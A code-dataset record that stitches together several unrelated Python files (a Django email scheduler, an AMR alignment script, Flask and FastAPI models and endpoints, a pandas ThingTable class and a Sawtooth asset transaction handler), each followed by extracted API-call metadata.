"sentinel.tests.functional.base.FederatedUserClient",
"sentinel.tests.functional.client_fixtures.Server",
"sentinel.tests.functional.client_fixtures.UserProjectGrant"
] | [((1012, 1077), 'sentinel.tests.functional.base.FederatedUserClient', 'base.FederatedUserClient', (['grant.user.entity', 'grant.project.entity'], {}), '(grant.user.entity, grant.project.entity)\n', (1036, 1077), False, 'from sentinel.tests.functional import base\n'), ((953, 993), 'sentinel.tests.functional.client_fixtures.UserProjectGrant', 'fixtures.UserProjectGrant', (['self.sentinel'], {}), '(self.sentinel)\n', (978, 993), True, 'from sentinel.tests.functional import client_fixtures as fixtures\n'), ((1111, 1134), 'sentinel.tests.functional.client_fixtures.Server', 'fixtures.Server', (['client'], {}), '(client)\n', (1126, 1134), True, 'from sentinel.tests.functional import client_fixtures as fixtures\n')] |
from django.apps import AppConfig
from django.db.models.signals import post_migrate
import logging
LOGGER = logging.getLogger(__name__)
def start_reminder_email_task(sender, **kwargs):
from .tasks import send_reminder_email, send_queued_mail, update_registration_status
# reminder emails are scheduled to run daily
send_reminder_email(repeat=60 * 60 * 24, repeat_until=None)
# queued mail is processed every five minutes
send_queued_mail(repeat=60 * 5, repeat_until=None)
# registration status check scheduled to run daily
update_registration_status(repeat=60 * 60 * 24, repeat_until=None)
class EmailServiceConfig(AppConfig):
name = "email_service"
verbose_name = "DCBR Email Service"
def ready(self):
# start email reminder task once migrations have completed
post_migrate.connect(start_reminder_email_task, sender=self)
| [
"logging.getLogger",
"django.db.models.signals.post_migrate.connect"
] | [((109, 136), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (126, 136), False, 'import logging\n'), ((827, 887), 'django.db.models.signals.post_migrate.connect', 'post_migrate.connect', (['start_reminder_email_task'], {'sender': 'self'}), '(start_reminder_email_task, sender=self)\n', (847, 887), False, 'from django.db.models.signals import post_migrate\n')] |
import argparse
import penman
from amrlib.evaluate.smatch_enhanced import compute_smatch
from ensemble.utils import align, get_entries
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Graph Ensemble (Graphene)')
parser.add_argument(
'-g', '--gold', default='./datasets/spring_gold_bio.txt',
type=str,
help='Gold amr file')
parser.add_argument(
'-p', '--prediction', default='./datasets/graphene_bio_all.wiki.txt',
type=str,
help='Prediction files')
args = parser.parse_args()
ref_fname = args.gold
print('Gold file:', ref_fname)
gen_fname = args.prediction
original_gold_entries, gold_entries = get_entries(ref_fname)
print('Prediction file:', gen_fname)
original_test_entries_1, test_entries_1 = get_entries(gen_fname)
print("Align files")
test = align(original_gold_entries, original_test_entries_1, test_entries_1)
precision, recall, f_score = compute_smatch(test, gold_entries)
print(' SMATCH -> P: %.3f, R: %.3f, F: %.3f' % (precision, recall, f_score))
test = [penman.encode(penman.decode(g)) for g in test]
outputs = []
for g, p in zip(original_gold_entries, test):
r = penman.decode(g)
s = '# ::snt ' + r.metadata['snt'] + '\n' + '# ::id ' + r.metadata['id'] + '\n' + p
outputs.append(s)
output_file = args.prediction + '.aligned'
with open(output_file, 'wt') as f:
print('Write prediction to', output_file)
f.write('\n\n'.join(map(str, outputs)))
| [
"penman.decode",
"argparse.ArgumentParser",
"amrlib.evaluate.smatch_enhanced.compute_smatch",
"ensemble.utils.align",
"ensemble.utils.get_entries"
] | [((178, 242), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Graph Ensemble (Graphene)"""'}), "(description='Graph Ensemble (Graphene)')\n", (201, 242), False, 'import argparse\n'), ((703, 725), 'ensemble.utils.get_entries', 'get_entries', (['ref_fname'], {}), '(ref_fname)\n', (714, 725), False, 'from ensemble.utils import align, get_entries\n'), ((813, 835), 'ensemble.utils.get_entries', 'get_entries', (['gen_fname'], {}), '(gen_fname)\n', (824, 835), False, 'from ensemble.utils import align, get_entries\n'), ((872, 941), 'ensemble.utils.align', 'align', (['original_gold_entries', 'original_test_entries_1', 'test_entries_1'], {}), '(original_gold_entries, original_test_entries_1, test_entries_1)\n', (877, 941), False, 'from ensemble.utils import align, get_entries\n'), ((975, 1009), 'amrlib.evaluate.smatch_enhanced.compute_smatch', 'compute_smatch', (['test', 'gold_entries'], {}), '(test, gold_entries)\n', (989, 1009), False, 'from amrlib.evaluate.smatch_enhanced import compute_smatch\n'), ((1232, 1248), 'penman.decode', 'penman.decode', (['g'], {}), '(g)\n', (1245, 1248), False, 'import penman\n'), ((1120, 1136), 'penman.decode', 'penman.decode', (['g'], {}), '(g)\n', (1133, 1136), False, 'import penman\n')] |
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
class Participant(db.Model):
id = db.Column(db.Integer, primary_key=True)
firstname = db.Column(db.String(80), nullable=False)
lastname = db.Column(db.String(80), nullable=False)
classname = db.Column(db.String(7), nullable=False)
email_student = db.Column(db.String(120), unique=True, nullable=False)
company_name = db.Column(db.String(80), nullable=False)
trainer_name = db.Column(db.String(80), nullable=False)
email_trainer = db.Column(db.String(120), nullable=False)
student_validation = db.Column(db.String(40), unique=True)
trainer_validation = db.Column(db.String(40), unique=True)
student_validated = db.Column(db.Boolean(), default=False)
trainer_validated = db.Column(db.Boolean(), default=False)
def get_full_name(self):
return '{} {}'.format(self.firstname, self.lastname)
def __repr__(self):
return f'<Student {self.get_full_name()}, {self.classname} from {self.company_name}>'
| [
"flask_sqlalchemy.SQLAlchemy"
] | [((48, 60), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (58, 60), False, 'from flask_sqlalchemy import SQLAlchemy\n')] |
# -*- encoding: utf-8 -*-
"""
@File : views.py
@Time : 2020/4/11 14:04
@Author : chise
@Email : <EMAIL>
@Software: PyCharm
@info :
"""
import math
from datetime import datetime
from typing import Dict
from fastapi import APIRouter, Query, Depends
from sqlalchemy import select, func, insert
from fastapi_admin import User, AdminDatabase
from fastapi_admin.auth.depends import create_current_active_user
from fastapi_admin.publicDepends.paging_query import paging_query_depend
from .schemas import TransactionType, OrderStatusEnum, OrderPostSchema, OrderPostRes
router = APIRouter()
from .models import Order
from fastapi_admin.views.methods_get import model_get_list_func
from fastapi_admin.views.methods_post import model_post_func
order_get_list, schema = model_get_list_func(Order, )
order_post, order_post_schema = model_post_func(Order)
router.post('/order', name="创建订单", deprecated=True, response_model=order_post_schema)(order_post)
@router.post('/v2/order', name='创建订单', deprecated=True, response_model=OrderPostRes)
async def order_post(order_info: OrderPostSchema, current_user: User = Depends(create_current_active_user(True))):
print(order_info)
res = dict(order_info)
query = insert(Order).values(res)
res['id'] = await AdminDatabase().database.execute(query)
return res
@router.get('/order', name="订单列表过滤功能测试")
async def order_list(platform: str = Query(None, description="平台订单号"),
tenant: str = Query(None, description="商户订单号"),
official: str = Query(None, description="官方订单号"),
channel_id: str = Query(None, description="通道id"),
goods_name: str = Query(None, description="商品名称"),
transaction_type: TransactionType = Query(None, description="支付方式"),
start_create_time: datetime = Query(None, description="开始时间"),
end_create_time: datetime = Query(None, description="截止时间"),
status: OrderStatusEnum = Query(None, description="订单状态"),
page: Dict[str, int] = Depends(paging_query_depend),
current_user: User = Depends(create_current_active_user(True))):
table = Order.__table__
query = Order.__table__.select()
if platform != None: # 平台订单号
query = query.where(table.c.platform_id.like('%' + platform + '%'))
elif tenant != None:
query = query.where(table.c.bussiness_order_id.like('%' + tenant + '%'))
elif official != None:
query = query.where(table.c.offical_order_id.like('%' + official + '%'))
else:
if channel_id:
query = query.where(table.c.channel_id.like('%' + channel_id + '%'))
if goods_name:
query = query.where(table.c.goods_name.like('%' + goods_name + '%'))
if transaction_type:
query = query.where(table.c.transaction_type == transaction_type)
if status:
query = query.where(table.c.status == status)
if start_create_time:
query = query.where(table.c.create_time >= start_create_time)
if end_create_time:
query = query.where(table.c.create_time <= end_create_time)
query = query.offset((page['page_number'] - 1) * page['page_size']).limit(
page['page_size']) # 第一页,每页20条数据。 默认第一页。
paginate_obj = await AdminDatabase().database.fetch_all(query)
query2 = select([func.count(table.c.id)])
total_page = await AdminDatabase().database.fetch_val(query2)
res_obj = {
"page_count": int(math.ceil(total_page * 1.0 / page['page_size'])),
"rows_total": total_page,
"page_number": page['page_number'],
"page_size": page['page_size'],
"data": paginate_obj
}
return res_obj
| [
"fastapi_admin.AdminDatabase",
"sqlalchemy.func.count",
"math.ceil",
"sqlalchemy.insert",
"fastapi_admin.auth.depends.create_current_active_user",
"fastapi_admin.views.methods_get.model_get_list_func",
"fastapi.APIRouter",
"fastapi.Query",
"fastapi.Depends",
"fastapi_admin.views.methods_post.model... | [((585, 596), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (594, 596), False, 'from fastapi import APIRouter, Query, Depends\n'), ((774, 800), 'fastapi_admin.views.methods_get.model_get_list_func', 'model_get_list_func', (['Order'], {}), '(Order)\n', (793, 800), False, 'from fastapi_admin.views.methods_get import model_get_list_func\n'), ((835, 857), 'fastapi_admin.views.methods_post.model_post_func', 'model_post_func', (['Order'], {}), '(Order)\n', (850, 857), False, 'from fastapi_admin.views.methods_post import model_post_func\n'), ((1402, 1434), 'fastapi.Query', 'Query', (['None'], {'description': '"""平台订单号"""'}), "(None, description='平台订单号')\n", (1407, 1434), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1471, 1503), 'fastapi.Query', 'Query', (['None'], {'description': '"""商户订单号"""'}), "(None, description='商户订单号')\n", (1476, 1503), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1542, 1574), 'fastapi.Query', 'Query', (['None'], {'description': '"""官方订单号"""'}), "(None, description='官方订单号')\n", (1547, 1574), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1615, 1646), 'fastapi.Query', 'Query', (['None'], {'description': '"""通道id"""'}), "(None, description='通道id')\n", (1620, 1646), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1687, 1718), 'fastapi.Query', 'Query', (['None'], {'description': '"""商品名称"""'}), "(None, description='商品名称')\n", (1692, 1718), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1777, 1808), 'fastapi.Query', 'Query', (['None'], {'description': '"""支付方式"""'}), "(None, description='支付方式')\n", (1782, 1808), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1861, 1892), 'fastapi.Query', 'Query', (['None'], {'description': '"""开始时间"""'}), "(None, description='开始时间')\n", (1866, 1892), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1943, 1974), 'fastapi.Query', 'Query', (['None'], {'description': '"""截止时间"""'}), "(None, description='截止时间')\n", (1948, 1974), False, 'from fastapi import APIRouter, Query, Depends\n'), ((2023, 2054), 'fastapi.Query', 'Query', (['None'], {'description': '"""订单状态"""'}), "(None, description='订单状态')\n", (2028, 2054), False, 'from fastapi import APIRouter, Query, Depends\n'), ((2100, 2128), 'fastapi.Depends', 'Depends', (['paging_query_depend'], {}), '(paging_query_depend)\n', (2107, 2128), False, 'from fastapi import APIRouter, Query, Depends\n'), ((1122, 1154), 'fastapi_admin.auth.depends.create_current_active_user', 'create_current_active_user', (['(True)'], {}), '(True)\n', (1148, 1154), False, 'from fastapi_admin.auth.depends import create_current_active_user\n'), ((2180, 2212), 'fastapi_admin.auth.depends.create_current_active_user', 'create_current_active_user', (['(True)'], {}), '(True)\n', (2206, 2212), False, 'from fastapi_admin.auth.depends import create_current_active_user\n'), ((1219, 1232), 'sqlalchemy.insert', 'insert', (['Order'], {}), '(Order)\n', (1225, 1232), False, 'from sqlalchemy import select, func, insert\n'), ((3437, 3459), 'sqlalchemy.func.count', 'func.count', (['table.c.id'], {}), '(table.c.id)\n', (3447, 3459), False, 'from sqlalchemy import select, func, insert\n'), ((3570, 3617), 'math.ceil', 'math.ceil', (["(total_page * 1.0 / page['page_size'])"], {}), "(total_page * 1.0 / page['page_size'])\n", (3579, 3617), False, 'import math\n'), ((1267, 1282), 'fastapi_admin.AdminDatabase', 'AdminDatabase', ([], {}), '()\n', (1280, 1282), False, 'from fastapi_admin import User, AdminDatabase\n'), ((3374, 3389), 'fastapi_admin.AdminDatabase', 'AdminDatabase', ([], {}), '()\n', (3387, 3389), False, 'from fastapi_admin import User, AdminDatabase\n'), ((3485, 3500), 'fastapi_admin.AdminDatabase', 'AdminDatabase', ([], {}), '()\n', (3498, 3500), False, 'from fastapi_admin import User, AdminDatabase\n')] |
#
# Copyright (c) 2021 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import textwrap
#
# thing_table.py
#
# Part of text_extensions_for_pandas
#
# Data structure for managing collections of immutable items that implement
# __hash__ and __eq__. Serves as a base class for StringTable
#
from abc import ABC, abstractmethod
from typing import *
import numpy as np
class ThingTable(ABC):
"""
A set of immutable things, plus integer IDs for said things.
Also implicitly maps `None` to ID -1.
Serves as a base class for collections of specific things like strings and
tokenizations.
"""
# Special integer ID for None as a thing.
NONE_ID = -1
# Special integer ID for "not an id"
NOT_AN_ID = -2
def __init__(self):
# Bidirectional map from unique thing (possibly boxed for dictionary
# compatibility) to integer ID and back
self._boxed_thing_to_id = {} # type: Dict[Any, int]
self._id_to_boxed_thing = [] # type: List[Any]
self._total_bytes = 0 # type: int
@abstractmethod
def size_of_thing(self, thing: Any) -> int:
"""
:param thing: Thing to be insterted in this table
:return: The number of bytes that the thing occupies in memory
"""
pass
@abstractmethod
def type_of_thing(self) -> Type:
"""
:return: Expected type of things that this table will manage
"""
pass
def box(self, thing: Any) -> Any:
"""
Subclasses should override this method if they manage items that aren't
compatible with Python dictionaries.
:param thing: Thing to insert into the table
:return: a dictionary-compatible boxed version of `thing`, if such boxing
is needed to make `thing` dictionary-compatible.
"""
# Default implementation is a no-op
return thing
def unbox(self, boxed_thing: Any) -> Any:
"""
Subclasses should override this method if they manage items that aren't
compatible with Python dictionaries.
:param boxed_thing: Thing that was boxed by this class's `box` method.
:return: Original thing that was passed to `box`
"""
# Default implementation is a no-op
return boxed_thing
@classmethod
def create_single(cls, thing: Any):
"""
Factory method for building a table containing a single value at ID 0.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
"""
# For now we return a fresh table each time.
ret = cls()
ret.maybe_add_thing(thing)
return ret
@classmethod
def merge_tables_and_ids(cls, tables: Sequence["ThingTable"],
int_ids: Sequence[np.ndarray]) \
-> Tuple["ThingTable", np.ndarray]:
"""
Factory method for combining together multiple references to different
ThingTables into references to a new, combined ThingTable of the same type.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
:param tables: A list of (possibly) different mappings from int to string
:param int_ids: List of lists of integer IDs that decode to strings via the
corresponding elements of `tables`.
:returns: A tuple containing:
* A new, merged table containing all the unique things under `tables`
that are referenced in `int_ids` (and possibly additional things that aren't
referenced)
* Numpy arrays of integer offsets into the new table, corresponding to the
elements of `int_ids`
"""
if len(tables) != len(int_ids):
raise ValueError(f"Got {len(tables)} {cls}s "
f"and {len(int_ids)} lists of IDs.")
# TODO: Add fast-path code here to pass through the first table if
# both input tables are identical.
new_table = cls()
new_ids_list = []
for i in range(len(tables)):
old_table = tables[i]
if not isinstance(old_table, cls):
raise TypeError(f"Expected table of type {cls}, but got "
f"{type(old_table)}")
old_ids = int_ids[i]
if len(old_ids.shape) != 1:
raise ValueError(f"Invalid shape for IDs {old_ids}")
new_ids = np.empty_like(old_ids, dtype=int)
old_id_to_new_id = [
new_table.maybe_add_thing(old_table.id_to_thing(j))
for j in range(old_table.num_things)
]
for j in range(len(old_ids)):
new_ids[j] = old_id_to_new_id[old_ids[j]]
new_ids_list.append(new_ids)
return new_table, new_ids_list
@classmethod
def merge_things(cls, things: Union[Sequence[Any], np.ndarray]):
f"""
Factory method for bulk-adding multiple things to create a single
ThingTable and a list of integer IDs against that ThingTable.
Users of this class are encouraged to use this method when possible,
so that performance tuning can be localized to this method.
:param things: things to be de-duplicated and converted to a ThingTable.
:returns: Two values:
* A ThingTable containing (at least) all the unique strings in `strings`
* A Numppy array of integer string IDs against the returned ThingTable, where
each ID maps to the corresponding element of `strings`
"""
new_table = cls()
str_ids = np.empty(len(things), dtype=int)
for i in range(len(things)):
str_ids[i] = new_table.maybe_add_thing(things[i])
return new_table, str_ids
@classmethod
def from_things(cls, things: Union[Sequence[Any], np.ndarray]):
"""
Factory method for creating a ThingTable from a sequence of unique things.
:param things: sequence of unique things to be added to the ThingTable.
:return: A ThingTable containing the elements of `things`.
"""
new_table = cls()
for thing in things:
new_table.add_thing(thing)
return new_table
def thing_to_id(self, thing: Any) -> int:
"""
:param thing: A thing to look up in this table
:returns: One of:
* The integer ID of the indicated thing, if present.
* `ThingTable.NONE_ID` if thing is None
* `ThingTable.NOT_AN_ID` if thing is not present in the table
"""
if thing is None:
# By convention, None maps to -1
return ThingTable.NONE_ID
elif not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
else:
# Remaining branches require boxing for dictionary lookup
boxed_thing = self.box(thing)
if boxed_thing not in self._boxed_thing_to_id:
return ThingTable.NOT_AN_ID
else:
return self._boxed_thing_to_id[boxed_thing]
def id_to_thing(self, int_id: Union[int, np.int64, np.int32]) -> Any:
"""
:param int_id: Integer ID that is potentially associated with a thing in the
table
:return: The associated thing, if present, or `None` if no thing is associated
with the indicated ID.
"""
if not isinstance(int_id, (int, np.int64, np.int32)):
raise TypeError(f"Expected integer, but received {int_id} "
f"of type {type(int_id)}")
elif int_id <= ThingTable.NOT_AN_ID:
raise ValueError(f"Invalid ID {int_id}")
elif ThingTable.NONE_ID == int_id:
return None
else:
boxed_thing = self._id_to_boxed_thing[int_id]
return self.unbox(boxed_thing)
def ids_to_things(self, int_ids: Union[Sequence[int], np.ndarray]) -> np.ndarray:
"""
Vectorized version of :func:`id_to_string` for translating multiple IDs
at once.
:param int_ids: Multiple integer IDs to be translated to strings
:returns: A numpy array of string objects.
"""
if not isinstance(int_ids, np.ndarray):
int_ids = np.array(int_ids, dtype=int)
if len(int_ids.shape) != 1:
raise TypeError(f"Invalid shape {int_ids.shape} for array of integer IDs.")
ret = np.empty(len(int_ids), dtype=object)
for i in range(len(int_ids)):
ret[i] = self.id_to_thing(int_ids[i].item())
return ret
def add_thing(self, thing: Any) -> int:
"""
Adds a thing to the table. Raises a ValueError if the thing is already
present.
:param thing: Thing to add
:return: unique ID for this thing
"""
if not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
# Box for dictionary compatibility
boxed_thing = self.box(thing)
if boxed_thing in self._boxed_thing_to_id:
raise ValueError(f"'{textwrap.shorten(str(thing), 40)}' already in table")
new_id = len(self._id_to_boxed_thing)
self._id_to_boxed_thing.append(boxed_thing)
self._boxed_thing_to_id[boxed_thing] = new_id
self._total_bytes += self.size_of_thing(thing)
return new_id
def maybe_add_thing(self, thing: Any) -> int:
"""
Adds a thing to the table if it is not already present.
:param thing: Thing to add
:return: unique ID for this thing
"""
if not isinstance(thing, self.type_of_thing()):
raise TypeError(f"Expected an object of type {self.type_of_thing()}, "
f"but received an object of type {type(thing)}")
current_id = self.thing_to_id(thing)
if current_id != ThingTable.NOT_AN_ID:
return current_id
else:
return self.add_thing(thing)
def maybe_add_things(self, s: Sequence[Any]) -> np.ndarray:
"""
Vectorized version of :func:`maybe_add_thing` for translating, and
potentially adding multiple things at once.
:param s: Multiple things to be translated and potentially added
:returns: A numpy array of the corresponding integer IDs for the things.
Adds each things to the table if it is not already present.
"""
result = np.empty(len(s), dtype=np.int32)
for i in range(len(result)):
result[i] = self.maybe_add_thing(s[i])
return result
def nbytes(self):
"""
Number of bytes in a (currently hypothetical) serialized version of this table.
"""
return self._total_bytes
@property
def num_things(self) -> int:
"""
:return: Number of distinct things in the table
"""
return len(self._id_to_boxed_thing)
@property
def things(self) -> Iterator[Any]:
"""
:return: Iterator over the unique things stored in this table.
"""
return (self.unbox(thing) for thing in self._id_to_boxed_thing)
@property
def ids(self) -> Iterator[int]:
"""
:return: Iterator over the IDs of things stored in this table, including the
implicit ID ThingTable.NONE_ID
"""
if ThingTable.NONE_ID != -1:
raise ValueError("Someone has changed the value of NONE_ID; need to rewrite "
"this function.")
return range(-1, len(self._id_to_boxed_thing))
def things_to_ids(self, things: Sequence[Any]) -> np.ndarray:
"""
Vectorized version of :func:`thing_to_id` for translating multiple things
at once.
:param things: Multiple things to be translated to IDs. Must be already
in the table's set of things.
:returns: A numpy array of the same integers that :func:`thing_to_id` would
return.
"""
ret = np.empty(len(things), dtype=np.int32)
for i in range(len(things)):
ret[i] = self.thing_to_id(things[i])
return ret
| [
"numpy.array",
"numpy.empty_like"
] | [((5071, 5104), 'numpy.empty_like', 'np.empty_like', (['old_ids'], {'dtype': 'int'}), '(old_ids, dtype=int)\n', (5084, 5104), True, 'import numpy as np\n'), ((9024, 9052), 'numpy.array', 'np.array', (['int_ids'], {'dtype': 'int'}), '(int_ids, dtype=int)\n', (9032, 9052), True, 'import numpy as np\n')] |
# ------------------------------------------------------------------------------
# Copyright 2018 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import logging
from sawtooth_sdk.processor.handler import TransactionHandler
from sawtooth_sdk.messaging.future import FutureTimeoutError
from sawtooth_sdk.processor.exceptions import InvalidTransaction
from sawtooth_sdk.processor.exceptions import InternalError
from protobuf.setting_pb2 import Settings
from protobuf.asset_pb2 import (
Asset, AssetPayload, AssetProposal,
AssetVote, AssetCandidate, AssetCandidates)
from modules.address import Address
LOGGER = logging.getLogger(__name__)
# Number of seconds to wait for state operations to succeed
STATE_TIMEOUT_SEC = 10
class AssetTransactionHandler(TransactionHandler):
def __init__(self):
self._addresser = Address.asset_addresser()
self._auth_list = None
self._action = None
self._settings = None
@property
def addresser(self):
return self._addresser
@property
def family_name(self):
return self.addresser.family_ns_name
@property
def family_versions(self):
return self.addresser.family_versions
@property
def namespaces(self):
return [self.addresser.family_ns_hash]
@property
def settings(self):
return self._settings
@settings.setter
def settings(self, settings):
self._settings = settings
def asset_address(self, asset):
return self.addresser.asset_address(
asset.system,
asset.key,
asset.value)
def apply(self, transaction, context):
txn_header = transaction.header
public_key = txn_header.signer_public_key
asset_payload = AssetPayload()
asset_payload.ParseFromString(transaction.payload)
auth_keys = self._get_auth_keys(context)
if auth_keys and public_key not in auth_keys:
raise InvalidTransaction(
'{} is not authorized to change asset'.format(public_key))
if asset_payload.action == AssetPayload.ACTION_GENESIS:
asset = Asset()
asset.ParseFromString(asset_payload.data)
_set_asset(context, self.asset_address(asset), asset)
elif asset_payload.action == AssetPayload.ACTION_DIRECT:
asset = Asset()
asset.ParseFromString(asset_payload.data)
_set_asset(context, self.asset_address(asset), asset)
elif asset_payload.action == AssetPayload.ACTION_PROPOSE:
return self._apply_proposal(
public_key,
asset_payload.data,
context)
elif asset_payload.action == AssetPayload.ACTION_VOTE:
return self._apply_vote(
public_key,
auth_keys,
asset_payload.data,
context)
elif asset_payload.action == AssetPayload.ACTION_UNSET:
return self._apply_unset_vote(
public_key,
auth_keys,
asset_payload.data,
context)
else:
raise InvalidTransaction(
"'Payload action not recognized {}".
format(asset_payload.action))
def _apply_proposal(self, public_key, proposal_data, context):
asset_proposal = AssetProposal()
asset_proposal.ParseFromString(proposal_data)
asset = Asset()
asset.ParseFromString(asset_proposal.asset)
proposal_id = self.asset_address(asset)
approval_threshold = self._get_approval_threshold(context)
if approval_threshold > 1:
asset_candidates = self._get_candidates(context)
existing_candidate = _first(
asset_candidates.candidates,
lambda candidate: candidate.proposal_id == proposal_id)
if existing_candidate is not None:
raise InvalidTransaction(
'Duplicate proposal for {}'.format(
asset_proposal.type))
record = AssetCandidate.VoteRecord(
public_key=public_key,
vote=AssetCandidate.VoteRecord.VOTE_ACCEPT)
asset_candidates.candidates.add(
proposal_id=proposal_id,
proposal=asset_proposal,
votes=[record])
self._set_candidates(context, asset_candidates)
else:
_set_asset(context, proposal_id, asset)
LOGGER.debug('Set asset {}'.format(proposal_id))
def _apply_unset_vote(
self, public_key, authorized_keys, vote_data, context):
"""Apply an UNSET vote on a proposal"""
asset_vote = AssetVote()
asset_vote.ParseFromString(vote_data)
proposal_id = asset_vote.proposal_id
# Find the candidate based on proposal_id
asset_candidates = self._get_candidates(context)
candidate = _first(
asset_candidates.candidates,
lambda candidate: candidate.proposal_id == proposal_id)
if candidate is None:
raise InvalidTransaction(
"Proposal {} does not exist.".format(proposal_id))
vote_record = _first(candidate.votes,
lambda record: record.public_key == public_key)
if vote_record is None:
raise InvalidTransaction(
'{} has not voted'.format(public_key))
vote_index = _index_of(candidate.votes, vote_record)
candidate_index = _index_of(asset_candidates.candidates, candidate)
# Delete the vote from the votes collection
del candidate.votes[vote_index]
# Test if there are still votes and save if so,
# else delete the candidate as well
if len(candidate.votes) == 0:
LOGGER.debug("No votes remain for proposal... removing")
del asset_candidates.candidates[candidate_index]
else:
LOGGER.debug("Votes remain for proposal... preserving")
self._set_candidates(context, asset_candidates)
def _apply_vote(self, public_key, authorized_keys, vote_data, context):
"""Apply an ACCEPT or REJECT vote to a proposal"""
asset_vote = AssetVote()
asset_vote.ParseFromString(vote_data)
proposal_id = asset_vote.proposal_id
asset_candidates = self._get_candidates(context)
candidate = _first(
asset_candidates.candidates,
lambda candidate: candidate.proposal_id == proposal_id)
if candidate is None:
raise InvalidTransaction(
"Proposal {} does not exist.".format(proposal_id))
approval_threshold = self._get_approval_threshold(context)
vote_record = _first(candidate.votes,
lambda record: record.public_key == public_key)
if vote_record is not None:
raise InvalidTransaction(
'{} has already voted'.format(public_key))
candidate_index = _index_of(asset_candidates.candidates, candidate)
candidate.votes.add(
public_key=public_key,
vote=asset_vote.vote)
accepted_count = 0
rejected_count = 0
for vote_record in candidate.votes:
if vote_record.vote == AssetVote.VOTE_ACCEPT:
accepted_count += 1
elif vote_record.vote == AssetVote.VOTE_REJECT:
rejected_count += 1
LOGGER.debug(
"Vote tally accepted {} rejected {}"
.format(accepted_count, rejected_count))
asset = Asset()
asset.ParseFromString(candidate.proposal.asset)
if accepted_count >= approval_threshold:
_set_asset(context, proposal_id, asset)
LOGGER.debug("Consensus to create {}".format(proposal_id))
del asset_candidates.candidates[candidate_index]
self._set_candidates(context, asset_candidates)
elif rejected_count >= approval_threshold or \
(rejected_count + accepted_count) == len(authorized_keys):
LOGGER.debug(
'Proposal for {} was rejected'.format(proposal_id))
del asset_candidates.candidates[candidate_index]
self._set_candidates(context, asset_candidates)
else:
LOGGER.debug('Vote recorded for {}'.format(proposal_id))
self._set_candidates(context, asset_candidates)
def _get_candidates(self, context):
"""Get the candidate container from state.
"""
candidates = _get_candidates(
context,
self.addresser.candidate_address)
if not candidates:
raise InvalidTransaction(
'Candidates for {} '
'must exist.'.format(self.dimension))
return candidates
def _set_candidates(self, context, candidates):
_set_candidates(
context,
self.addresser.candidate_address,
candidates)
def _get_auth_keys(self, context):
"""Retrieve the authorization keys for units"""
if not self.settings:
self.settings = _get_setting(
context,
self.addresser.setting_address)
if self.settings and self.settings.auth_list:
return _string_tolist(self.settings.auth_list)
else:
raise InvalidTransaction(
'Asset auth_list settings does not exist')
def _get_approval_threshold(self, context):
"""Retrieve the threshold setting for units"""
if not self.settings:
self.settings = _get_setting(
context,
self.addresser.setting_address)
if self.settings and self.settings.threshold:
return int(self.settings.threshold)
else:
raise InvalidTransaction(
'Asset threshold settings does not exist.')
def _get_setting(context, address, default_value=None):
"""Get a hashblock settings from the block
"""
setting = Settings()
results = _get_state(context, address)
if results:
setting.ParseFromString(results[0].data)
return setting
return default_value
def _get_candidates(context, address, default_value=None):
candidates = AssetCandidates()
results = _get_state(context, address)
if results:
candidates.ParseFromString(results[0].data)
return candidates
def _set_candidates(context, address, candidates):
addresses = _set_state(context, address, candidates)
if len(addresses) != 1:
LOGGER.warning(
'Failed to save candidates on address %s', address)
raise InternalError(
'Unable to save candidate block value {}'.format(candidates))
def _set_asset(context, address, asset):
# Use address to see if entry type exists
# If exists, update with current type entry
# set entry
# Get an empty from the type
# Get the address and pass to _get_asset_entry
addresses = _set_state(context, address, asset)
if len(addresses) != 1:
LOGGER.warning(
'Failed to save value on address %s', address)
raise InternalError(
'Unable to save asset {}'.format(address))
context.add_event(
event_type="hashbloc.asset/update",
attributes=[("updated", address)])
def _get_state(context, address):
try:
results = context.get_state([address], timeout=STATE_TIMEOUT_SEC)
except FutureTimeoutError:
raise InternalError('State timeout: Unable to get {}'.format(address))
return results
def _set_state(context, address, entity):
try:
result = context.set_state(
{address: entity.SerializeToString()},
timeout=STATE_TIMEOUT_SEC)
except FutureTimeoutError:
raise InternalError('State timeout: Unable to set {}'.format(entity))
addresses = list(result)
return addresses
def _string_tolist(s):
"""Convert the authorization comma separated string to list
"""
return [v.strip() for v in s.split(',') if v]
def _first(a_list, pred):
return next((x for x in a_list if pred(x)), None)
def _index_of(iterable, obj):
return next((i for i, x in enumerate(iterable) if x == obj), -1)
| [
"logging.getLogger",
"protobuf.asset_pb2.AssetCandidates",
"protobuf.setting_pb2.Settings",
"protobuf.asset_pb2.AssetVote",
"protobuf.asset_pb2.AssetPayload",
"sawtooth_sdk.processor.exceptions.InvalidTransaction",
